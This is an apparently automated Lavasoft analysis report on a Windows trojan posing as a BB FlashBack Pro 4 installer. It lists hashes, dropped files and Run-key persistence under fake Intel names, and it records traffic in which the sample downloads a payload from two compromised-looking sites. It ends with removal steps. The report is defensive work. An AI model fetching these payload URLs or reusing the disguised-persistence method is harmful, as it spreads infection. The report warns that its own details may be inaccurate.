Gen.Heur.Bodegun.1_ea46ee27e1
Trojan.Win32.Reconyc.evlt (Kaspersky), Gen:Heur.Bodegun.1 (AdAware), Trojan.NSIS.StartPage.FD (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: ea46ee27e1fbe7bf9d39c136fcdea33b
SHA1: 78527b3aa327fb1277b7ae132d9a1e97327f1764
SHA256: 8b7027c5ee801e063e6af99f0d2d1d352437cb8349d0fa02d0d0c964871dfbb8
SSDeep: 196608:MVBP5t/xcm9ZJiPy/puWpqC8NtYIYW8D8I W5ovz6NGzsTYlZA/D:sxlnRfpq38X z gA
Size: 14517248 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-10-02 20:03:56
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:1752
TempSetup.exe:444
Tempbbflbk4.exe:1908
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
ShimCacheMutex
File activity
The process %original file name%.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Tempbbflbk4.exe (107182 bytes)
%Documents and Settings%\%current user%\Local Settings\TempSetup.exe (230 bytes)
The process TempSetup.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\system\svchost.exe (11964 bytes)
%WinDir%\system\server.zip (6671 bytes)
%WinDir%\system\taskhost.exe (3172 bytes)
The Trojan deletes the following file(s):
%WinDir%\system\server.zip (0 bytes)
The process Tempbbflbk4.exe:1908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\AdvSplash.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\links.ini (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\modern-wizard.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spltmp.bmp (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (1579032 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (0 bytes)
Registry activity
The process %original file name%.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 25 AC 30 77 FD 4A 76 15 97 F6 E4 E4 68 77 FE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1]
"Tempsetup.exe" = "Axlio"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1]
"Tempbbflbk4.exe" = "Tempbbflbk4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process TempSetup.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 6F 40 B1 3F 39 FB 7D 9E 9F 45 30 20 C6 AD 54"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Common User Interface" = "C:\Windows\system\svchost.exe"
"Intel(R) Common User Windows" = "C:\Windows\system\taskhost.exe"
The process Tempbbflbk4.exe:1908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 73 92 E8 EF C5 E5 F9 27 5C 31 BB 81 03 62 D2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| c9f5d0c41112ff0c018c8f3944baf5a2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\TempSetup.exe |
| 13cc92f90a299f5b2b2f795d0d2e47dc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\AdvSplash.dll |
| 9b3f214936612cb31aee3085f818bb72 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\System.dll |
| 7579ade7ae1747a31960a228ce02e666 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\UserInfo.dll |
| c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\nsDialogs.dll |
| 84a536dc4aa2fb1e4c3f222f159d3efe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Tempbbflbk4.exe |
| 54ca76d64d0fbf64eefa3fbf73887e2f | c:\WINDOWS\system\svchost.exe |
| dc17d30ae1fd630ead4819da1819ccc4 | c:\WINDOWS\system\taskhost.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Blueberry
Product Name: BB FlashBack Pro 4
Product Version: 4.1.9.3121
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.1.9.3121
File Description:
Comments:
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 14509028 | 14509056 | 5.54197 | d2c2bf6da3ad0d8988279f5138ddf34f |
| .sdata | 14524416 | 312 | 512 | 1.39815 | 077dbbcfff33679972bcd7d68127604f |
| .rsrc | 14532608 | 5714 | 6144 | 3.92205 | bc7ff4cb126dd668e0bb174c688bde70 |
| .reloc | 14540800 | 12 | 512 | 0.070639 | 26d09530a29582b5b0c45401afd333b8 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://customtshirtsandhoodies.org/koxoa/meomu.txt | |
| hxxp://songbienkhoipharma.com/images/advers/images/meomu.zip | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /images/advers/images/meomu.zip HTTP/1.1
Host: songbienkhoipharma.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 02:56:49 GMT
Server: Apache/2
Last-Modified: Wed, 30 Sep 2015 14:55:48 GMT
ETag: "286f9a-c396-520f8203b30e2"
Accept-Ranges: bytes
Content-Length: 50070
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: application/zip
GET /koxoa/meomu.txt HTTP/1.1
Host: customtshirtsandhoodies.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 03:06:32 GMT
Last-Modified: Wed, 30 Sep 2015 15:06:23 GMT
ETag: "3c26d2-3c-520f8461eeb4f"
Content-Length: 60
Vary: User-Agent
Content-Type: text/plain
X-Varnish: 326474024
Age: 0
X-Cache: MISS
Connection: keep-alive
Accept-Ranges: bytes

hXXp://songbienkhoipharma.com/images/advers/images/meomu.zip
The Trojan connects to the servers at the following location(s):
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Tempbbflbk4.exe (107182 bytes)
%Documents and Settings%\%current user%\Local Settings\TempSetup.exe (230 bytes)
%WinDir%\system\svchost.exe (11964 bytes)
%WinDir%\system\server.zip (6671 bytes)
%WinDir%\system\taskhost.exe (3172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\AdvSplash.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\links.ini (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\modern-wizard.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spltmp.bmp (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (1579032 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Common User Interface" = "C:\Windows\system\svchost.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Common User Windows" = "C:\Windows\system\taskhost.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.